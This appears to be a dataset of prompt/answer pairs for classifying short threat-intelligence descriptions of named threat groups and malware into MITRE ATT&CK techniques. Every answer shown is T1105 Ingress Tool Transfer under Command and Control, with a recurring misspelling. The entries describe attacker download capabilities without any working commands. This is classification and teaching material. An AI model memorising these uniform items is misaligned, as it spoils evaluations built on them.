+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used remote code execution to download subsequent payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has downloaded additional tools including PsExec directly to endpoints.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has downloaded additional malware and tools onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group malware can download additional files from C2 servers.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has downloaded additional payloads and malicious scripts onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IndigoZebra has downloaded additional files and tools from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used tools to download files to compromised machines.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has downloaded additional scripts, tools, and malware onto victim systems.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter had downloaded additional tools to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has downloaded additional scripts and files from adversary-controlled servers.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has downloaded additional malware and tools onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has downloaded additional code and files from servers onto victims.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metador has downloaded tools and malware onto a compromised system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats used executables to download malicious files from different sources.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff has downloaded and installed web shells to following path C:\inetpub\wwwroot\aspnet_client\system_web\IISpool.aspx.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware that can upload additional files to the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has downloaded additional executables following the initial infection stage.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest has deployed secondary payloads and third stage implants to compromised hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nomadic Octopus has used malicious macros to download additional files to the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig can download remote files onto victims.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLATINUM has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork payloads download additional files from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rancor has downloaded additional malware, including by using certutil.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke used malware to download additional malicious files to the target system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used LNK files to download remote files to the victim's network.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has downloaded additional modules and malware to victim’s machines.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used malicious scripts and macros with the ability to download additional payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has downloaded additional malware to execute on victim systems.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has retrieved DLLs and installer binaries for malware execution from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has the curl and wget commands as well as batch scripts to download new tools.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has downloaded additional malware and tools, including through the use of `certutil`, onto a compromised host .","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has used a delivered trojan to download additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used shellcode to download Meterpreter after compromising a victim.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volatile Cedar can deploy additional tools.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIRTE has downloaded PowerShell code from the C2 server to be executed.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Whitefly has the ability to download additional tools from the C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used tools to deploy additional payloads to compromised hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti Group has downloaded an auxiliary program named ff.exe to infected machines.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider can transfer malicious payloads such as ransomware to compromised machines.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used tools to download malicious files to compromised hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has installed updates and new malware on victims.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ABK has the ability to download files from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ANDROMEDA can download additional payloads from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT has the ability to download additional payloads onto an infected machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can download additional files for execution on the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent.btz attempts to download an encrypted binary from a specified domain.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey can download and execute files to further infect a host machine with additional malware.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can download additional payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to download additional payloads from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth uses certutil and BITSAdmin to download additional malware.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT has the ability to download files over SFTP.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor can download additional plugins, updates and other files.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuditCred can download files and additional malware.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avenger has the ability to download files from C2 to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can download and execute additional files. Azorult has also downloaded a ransomware payload called Hermes.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADFLICK has download files from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH has the ability to load a second stage malicious DLL file onto a compromised machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBK has the ability to download files from C2 to the infected host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BISCUIT has a command to download a file from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITSAdmin can be used to create BITS Jobs to upload and/or download files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has downloaded files to a victim machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can download additional files onto the host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BONDUPDATER can download or upload files from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BUSHWALK can write malicious payloads sent through a web request’s command parameter.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has downloaded additional files from the C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig can download and execute additional payloads on a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea can download additional modules from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch can download and execute or update malware.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook can download files to the system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot uploads files and secondary payloads to the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BendyBear is designed to download an implant from a C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has the capability to download files to execute on the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackMould has the ability to download files to the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bonadan can download additional modules from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox has the ability to download next stage malware components to a compromised system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon can download files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Briba downloads files onto infected hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can download files to compromised hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can download and execute additional payloads including through the use of a `Dex` command.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore can download and execute new versions of itself.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CARROTBALL has the ability to download and install a remote payload.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CARROTBAT has the ability to download and execute a remote file via certutil.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK is capable of performing remote file transmission.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORESHELL downloads another dropper from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader can download additional tools to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto has the capability to upload and download files to the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CallMe has the capability to download a file to the victim from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cannon can download a payload for execution.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp can download and execute new plugins from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT can download and execute additional payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell has a module to download and upload files to the system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes is capable of downloading files, including additional modules.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes can download additional files onto an infected machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower has the ability to download additional modules to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: China Chopper's server component can download remote files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme can download its code from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can deliver additional payloads to victim machines.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CoinTicker executes a Python script to download its second stage.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker downloads an HTTP server to the infected machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner can download additional scripts from a web server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CostaBricks has been used to load SombRAT onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepyDrive can download files to the compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson contains a command to retrieve files from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cryptoistic has the ability to send and receive files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba can download files from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink has the ability to download files to target systems.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DDKONG downloads and uploads files on the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEATHRANSOM can download files to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DOGCALL can download and execute additional payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus can deploy additional tools onto an infected machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dacls can download its payload from a C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot can download additional files to a targeted system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can load any files onto the infected machine to execute.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate retrieves cryptocurrency mining payloads and commands in encrypted traffic from its command and control server. DarkGate uses Windows Batch scripts executing the curl command to retrieve follow-on payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can download additional packages for keylogging, cryptocurrency mining, and other capabilities; it can also retrieve malicious payloads such as Agent Tesla, AsyncRat, NanoCore, RedLine, Cobalt Strike, and Metasploit.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf can download remote files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis deploys additional backdoors and hacking tools to the system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol can receive configuration updates and additional payloads including wscpy.exe from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dipsind can download remote files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Disco can download files to targeted systems via SMB.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DnsSystem can download files to compromised systems after receiving a command with the string `downloaddd`.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki has downloaded scripts from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can download and execute previously staged shellcode payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After downloading its main config file, Downdelph downloads multiple payloads from C2 servers.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DropBook can download and execute additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub can download files to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack’s can download and upload a file to the victim’s computer.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre has a command to download and executes additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM can download and upload files to the victim's computer.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ecipekac can download additional payloads to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has the ability to download files from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise can download additional files from the C2 server for execution.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emissary has the capability to download files from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can upload and download to and from a victim machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has downloaded additional Lua scripts from the C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux has a command to download a file from and to a remote C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive has a function to download a file to the infected system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT downloads and uploads files to and from the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FYAnti can download additional payloads to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Felismus can download files from remote servers.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro can download additional malware from the C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy can transfer files from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can receive additional malicious components from an actor controlled C2 server and execute them on a compromised AD FS server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can download additional files onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer can execute a task to download a file.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
